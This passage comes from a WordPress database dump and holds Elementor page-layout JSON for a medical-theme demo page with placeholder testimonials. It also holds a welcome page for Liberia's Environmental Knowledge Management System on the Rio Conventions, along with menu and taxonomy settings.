fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":8},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0.4},\"button_text_color\":\"#333333\",\"background_color\":\"rgba(0,0,0,0)\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"xm3kst6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Register Now\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_family\":\"Dosis\",\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"background_color\":\"#01aef0\",\"hover_color\":\"#01aef0\",\"button_background_hover_color\":\"rgba(0,0,0,0)\",\"button_hover_border_color\":\"#01aef0\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"border_color\":\"#01aef0\",\"border_radius\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"30\",\"bottom\":\"10\",\"left\":\"30\",\"isLinked\":false},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":12}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"960wyxr\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#01aef0\",\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8dbf01c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"8231wcp\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"b8k6776\",\"elType\":\"widget\",\"settings\":{\"starting_number\":\"\",\"ending_number\":142,\"title\":\"saved hearts\",\"number_color\":\"#ffffff\",\"typography_number_typography\":\"custom\",\"typography_number_font_size\":{\"unit\":\"px\",\"size\":50},\"title_color\":\"#ffffff\",\"typography_title_typography\":\"custom\",\"typography_title_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_title_font_weight\":\"600\",\"typography_title_text_transform\":\"uppercase\",\"typography_title_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"typography_number_font_size_tablet\":{\"unit\":\"px\",\"size\":30},\"typography_title_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"counter\"}],\"isInner\":false},{\"id\":\"ktjw2tm\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"gffdt05\",\"elType\":\"widget\",\"settings\":{\"starting_number\":\"\",\"ending_number\":6424,\"suffix\":\"+\",\"title\":\"happy patients\",\"number_color\":\"#ffffff\",\"typography_number_typography\":\"custom\",\"typography_number_font_size\":{\"unit\":\"px\",\"size\":50},\"title_color\":\"#ffffff\",\"typography_title_typography\":\"custom\",\"typography_title_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_title_font_weight\":\"600\",\"typography_title_text_transform\":\"uppercase\",\"typography_title_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"typography_number_font_size_tablet\":{\"unit\":\"px\",\"size\":30},\"typography_title_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"counter\"}],\"isInner\":false},{\"id\":\"k1ny1cq\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"jegms49\",\"elType\":\"widget\",\"settings\":{\"starting_number\":\"\",\"ending_number\":1382,\"suffix\":\"+\",\"title\":\"doctors number\",\"number_color\":\"#ffffff\",\"typography_number_typography\":\"custom\",\"typography_number_font_size\":{\"unit\":\"px\",\"size\":50},\"title_color\":\"#ffffff\",\"typography_title_typography\":\"custom\",\"typography_title_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_title_font_weight\":\"600\",\"typography_title_text_transform\":\"uppercase\",\"typography_title_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"typography_number_font_size_tablet\":{\"unit\":\"px\",\"size\":30},\"typography_title_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"counter\"}],\"isInner\":false},{\"id\":\"mjm18s4\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"wsyu9mt\",\"elType\":\"widget\",\"settings\":{\"starting_number\":\"\",\"ending_number\":275,\"title\":\"saved lungs\",\"number_color\":\"#ffffff\",\"typography_number_typography\":\"custom\",\"typography_number_font_size\":{\"unit\":\"px\",\"size\":50},\"title_color\":\"#ffffff\",\"typography_title_typography\":\"custom\",\"typography_title_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_title_font_weight\":\"600\",\"typography_title_text_transform\":\"uppercase\",\"typography_title_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"typography_number_font_size_tablet\":{\"unit\":\"px\",\"size\":30},\"typography_title_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"counter\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"t2gvx2f\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/medical.oceanwp.org\\/wp-content\\/uploads\\/2017\\/09\\/img_159211.jpg\",\"id\":156},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#364e66\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.8},\"padding\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ffe3375\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"cq7te54\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"unlkljg\",\"elType\":\"widget\",\"settings\":{\"title\":\"What Our Patients Say\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"typography_line_height_mobile\":{\"unit\":\"em\",\"size\":1.4}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"ayvp0xr\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"weight\":{\"unit\":\"px\",\"size\":6},\"color\":\"#01aef0\",\"width\":{\"unit\":\"px\",\"size\":40},\"align\":\"center\",\"gap\":{\"unit\":\"px\",\"size\":16},\"_css_classes\":\"no-margin\",\"text\":\"Divider\"},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"rot3ixr\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Praesent vitae orci quam morbi vehicula eros sem, nec tincidunt ipsum imperdiet sed<\\/p>\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"gx8goxj\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"deb0197\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"fc8q2qe\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"1gdmbbl\",\"elType\":\"widget\",\"settings\":{\"testimonial_content\":\"Saperet periculis principes in vis, est ne minim admodum. Ignota perpetua torquatos id ius, ut consul probatus conceptam est, ea sit graecis singulis. Maiorum pertinacia ea per, has quis euripidis at. Persius civibus eligendi.\",\"testimonial_image\":{\"url\":\"https:\\/\\/medical.oceanwp.org\\/wp-content\\/uploads\\/2017\\/09\\/img_428339.jpg\",\"id\":153},\"testimonial_name\":\"Mike Wright\",\"testimonial_job\":\"Patient #1\",\"content_content_color\":\"#ffffff\",\"content_typography_typography\":\"custom\",\"content_typography_font_size\":{\"unit\":\"px\",\"size\":16},\"name_text_color\":\"#ffffff\",\"name_typography_typography\":\"custom\",\"name_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"name_typography_font_weight\":\"600\",\"name_typography_text_transform\":\"uppercase\",\"name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"job_text_color\":\"#ffffff\",\"job_typography_typography\":\"custom\",\"job_typography_font_size\":{\"unit\":\"px\",\"size\":12}},\"elements\":[],\"widgetType\":\"testimonial\"},{\"id\":\"eo56seo\",\"elType\":\"widget\",\"settings\":{\"weight\":{\"unit\":\"px\",\"size\":2},\"color\":\"rgba(255,255,255,0.2)\",\"text\":\"Divider\"},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"y7o9kxz\",\"elType\":\"widget\",\"settings\":{\"testimonial_content\":\"Sed tale aeterno saperet ex. Placerat quaestio ea ius, eos vocent euismod ex, alia recusabo signiferumque pro no. Qui mel dictas erroribus. Eros ullum no est, ei nisl wisi ius. Bonorum expetenda et eum. Ius dolor inimicus.\",\"testimonial_image\":{\"url\":\"https:\\/\\/medical.oceanwp.org\\/wp-content\\/uploads\\/2017\\/09\\/img_324658.jpg\",\"id\":152},\"testimonial_name\":\"Nancy Green\",\"testimonial_job\":\"Patient #3\",\"content_content_color\":\"#ffffff\",\"content_typography_typography\":\"custom\",\"content_typography_font_size\":{\"unit\":\"px\",\"size\":16},\"name_text_color\":\"#ffffff\",\"name_typography_typography\":\"custom\",\"name_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"name_typography_font_weight\":\"600\",\"name_typography_text_transform\":\"uppercase\",\"name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"job_text_color\":\"#ffffff\",\"job_typography_typography\":\"custom\",\"job_typography_font_size\":{\"unit\":\"px\",\"size\":12}},\"elements\":[],\"widgetType\":\"testimonial\"}],\"isInner\":true},{\"id\":\"ea8zdxf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"jzgwrdz\",\"elType\":\"widget\",\"settings\":{\"testimonial_content\":\"Ad qui facete melius dolores. Elitr invidunt vix ex, agam convenire democritum an mel. Ad per autem dicta consul, te corpora nostrum consulatu quo. An doming quodsi usu, id vis unum facilisi, vivendo nonumes hendrerit.\",\"testimonial_image\":{\"url\":\"https:\\/\\/medical.oceanwp.org\\/wp-content\\/uploads\\/2017\\/09\\/img_301284.jpg\",\"id\":151},\"testimonial_name\":\"Frances Lopez\",\"testimonial_job\":\"Patient #2\",\"content_content_color\":\"#ffffff\",\"content_typography_typography\":\"custom\",\"content_typography_font_size\":{\"unit\":\"px\",\"size\":16},\"name_text_color\":\"#ffffff\",\"name_typography_typography\":\"custom\",\"name_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"name_typography_font_weight\":\"600\",\"name_typography_text_transform\":\"uppercase\",\"name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"job_text_color\":\"#ffffff\",\"job_typography_typography\":\"custom\",\"job_typography_font_size\":{\"unit\":\"px\",\"size\":12}},\"elements\":[],\"widgetType\":\"testimonial\"},{\"id\":\"7fr075g\",\"elType\":\"widget\",\"settings\":{\"weight\":{\"unit\":\"px\",\"size\":2},\"color\":\"rgba(255,255,255,0.2)\",\"text\":\"Divider\"},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"6kl9wra\",\"elType\":\"widget\",\"settings\":{\"testimonial_content\":\"Morbi in ipsum sit amet pede facilisis laoreet. Donec lacus nunc, viverra nec, blandit vel, egestas et, augue. Vestibulum tincidunt malesuada ultrices enim. Curabitur sit amet mauris. Morbi in dui quis est pulvinar facilisi.\",\"testimonial_image\":{\"url\":\"https:\\/\\/medical.oceanwp.org\\/wp-content\\/uploads\\/2017\\/09\\/img_91227.jpg\",\"id\":150},\"testimonial_name\":\"Nick Smith\",\"testimonial_job\":\"Patient #4\",\"content_content_color\":\"#ffffff\",\"content_typography_typography\":\"custom\",\"content_typography_font_size\":{\"unit\":\"px\",\"size\":16},\"name_text_color\":\"#ffffff\",\"name_typography_typography\":\"custom\",\"name_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"name_typography_font_weight\":\"600\",\"name_typography_text_transform\":\"uppercase\",\"name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"job_text_color\":\"#ffffff\",\"job_typography_typography\":\"custom\",\"job_typography_font_size\":{\"unit\":\"px\",\"size\":12}},\"elements\":[],\"widgetType\":\"testimonial\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"yb7q3d9\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2b48461\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"bm6vhpr\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"393qxl0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Latest from blog\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":18}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"uqjuvgf\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"weight\":{\"unit\":\"px\",\"size\":6},\"color\":\"#01aef0\",\"width\":{\"unit\":\"px\",\"size\":40},\"align\":\"center\",\"gap\":{\"unit\":\"px\",\"size\":16},\"_css_classes\":\"no-margin\",\"text\":\"Divider\"},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"liad1d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Praesent vitae orci quam morbi vehicula eros sem, nec tincidunt ipsum imperdiet sed<\\/p>\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"mrc2wel\",\"elType\":\"widget\",\"settings\":{\"items\":\"3\",\"tablet\":\"2\",\"mobile\":\"1\",\"count\":\"6\",\"author\":\"false\",\"cat\":\"false\",\"excerpt_length\":\"15\",\"readmore_text\":\"Learn More\"},\"elements\":[],\"widgetType\":\"oew-blog-carousel\"}],\"isInner\":false}],\"isInner\":false}]'),(3111,401,'_elementor_version','2.7.5'),(3112,401,'_elementor_template_type','wp-page'),(3116,402,'_wp_page_template','default'),(3117,402,'_elementor_edit_mode','builder'),(3118,402,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":880},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_forest_biodiversity.jpg\",\"id\":396},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#113b66\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.55},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":40},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions - The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. Explore the Knowledge Resources by Related Topics and Institutions Resources.<\\/p>\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"search_submit_label\":\"Search\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"All Categories\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"yb7q3d9\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2b48461\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"bm6vhpr\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"393qxl0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Latest from blog\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":18}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"uqjuvgf\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"weight\":{\"unit\":\"px\",\"size\":6},\"color\":\"#01aef0\",\"width\":{\"unit\":\"px\",\"size\":40},\"align\":\"center\",\"gap\":{\"unit\":\"px\",\"size\":16},\"_css_classes\":\"no-margin\",\"text\":\"Divider\"},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"liad1d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Praesent vitae orci quam morbi vehicula eros sem, nec tincidunt ipsum imperdiet sed<\\/p>\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"mrc2wel\",\"elType\":\"widget\",\"settings\":{\"items\":\"3\",\"tablet\":\"2\",\"mobile\":\"1\",\"count\":\"6\",\"author\":\"false\",\"cat\":\"false\",\"excerpt_length\":\"15\",\"readmore_text\":\"Learn More\"},\"elements\":[],\"widgetType\":\"oew-blog-carousel\"}],\"isInner\":false}],\"isInner\":false}]'),(3119,402,'_elementor_version','2.7.5'),(3120,402,'_elementor_template_type','wp-page'),(3142,404,'_menu_item_type','post_type'),(3143,404,'_menu_item_menu_item_parent','0'),(3144,404,'_menu_item_object_id','9'),(3145,404,'_menu_item_object','page'),(3146,404,'_menu_item_target',''),(3147,404,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(3148,404,'_menu_item_xfn',''),(3149,404,'_menu_item_url',''),(3151,404,'_menu_item_template',''),(3152,404,'_menu_item_mega_template','0'),(3153,404,'_menu_item_nolink',''),(3154,404,'_menu_item_category_post',''),(3155,404,'_menu_item_megamenu',''),(3156,404,'_menu_item_megamenu_auto_width',''),(3157,404,'_menu_item_megamenu_col',''),(3158,404,'_menu_item_megamenu_heading',''),(3159,404,'_menu_item_megamenu_widgetarea','0'),(3160,404,'_menu_item_icon',''),(3161,404,'_elementor_controls_usage','a:0:{}'),(3187,412,'_elementor_controls_usage','a:0:{}'),(3188,412,'label_singular','Resource Category'),(3189,412,'public','1'),(3190,412,'show_ui','1'),(3191,412,'hierarchical','1'),(3192,412,'type','taxonomy'),(3193,412,'storage','meta'),(3194,412,'old_name','resource_category'),(3195,412,'rewrite','1'),(3196,412,'rewrite_with_front','1'),(3197,412,'rewrite_hierarchical','1'),(3198,412,'capability_type','default'),(3199,412,'capability_type_custom','resource_category'),(3200,412,'query_var','0'),(3201,412,'sort','0'),(3202,412,'built_in_post_types_amn_wpforms-lite','0'),(3203,412,'built_in_post_types_custom_css','0'),(3204,412,'built_in_post_types_customize_changeset','0'),(3205,412,'built_in_post_types_elementor-hf','0'),(3206,412,'built_in_post_types_elementor_library','0'),(3207,412,'built_in_post_types_jet-smart-filters','0'),(3208,412,'built_in_post_types_ocean_modal_window','0'),(3209,412,'built_in_post_types_ocean_posts_slider','0'),(3210,412,'built_in_post_types_oceanwp_library','0'),(3211,412,'built_in_post_types_oembed_cache','0'),(3212,412,'built_in_post_types_page','0'),(3213,412,'built_in_post_types_post','0'),(3214,412,'built_in_post_types_user_request','0'),(3215,412,'built_in_post_types_wp_block','0'),(3216,412,'built_in_post_types_wpforms','0'),(3217,412,'built_in_post_types_wpforms_log','0'),(3218,412,'built_in_post_types_attachment','0'),(3219,412,'show_in_menu','1'),(3220,412,'menu_location','default'),(3221,412,'menu_position','0'),(3222,412,'show_in_nav_menus','1'),(3223,412,'show_tagcloud','1'),(3224,412,'show_tagcloud_in_edit','1'),(3225,412,'show_in_quick_edit','1'),(3226,412,'show_admin_column','0'),(3227,412,'pfat_enable','0'),(3228,412,'pfat_run_outside_loop','0'),(3229,412,'pfat_append_archive','append'),(3230,412,'rest_enable','0'),(3231,412,'read_all','0'),(3232,412,'write_all','0'),(3233,413,'_elementor_controls_usage','a:0:{}'),(3234,413,'label_singular','Resource Tag'),(3235,413,'public','1'),(3236,413,'show_ui','1'),(3237,413,'hierarchical','1'),(3238,413,'type','taxonomy'),(3239,413,'storage','meta'),(3240,413,'old_name','resource_tag'),(3241,413,'rewrite','1'),(3242,413,'rewrite_with_front','1'),(3243,413,'rewrite_hierarchical','1'),(3244,413,'capability_type','default'),(3245,413,'capability_type_custom','resource_tag'),(3246,413,'query_var','0'),(3247,413,'sort','0'),(3248,413,'built_in_post_types_amn_wpforms-lite','0'),(3249,413,'built_in_post_types_custom_css','0'),(3250,413,'built_in_post_types_customize_changeset','0'),(3251,413,'built_in_post_types_elementor-hf','0'),(3252,413,'built_in_post_types_elementor_library','0'),(3253,413,'built_in_post_types_jet-smart-filters','0'),(3254,413,'built_in_post_types_ocean_modal_window','0'),(3255,413,'built_in_post_types_ocean_posts_slider','0'),(3256,413,'built_in_post_types_oceanwp_library','0'),(3257,413,'built_in_post_types_oembed_cache','0'),(3258,413,'built_in_post_types_page','0'),(3259,413,'built_in_post_types_post','0'),(3260,413,'built_in_post_types_user_request','0'),(3261,413,'built_in_post_t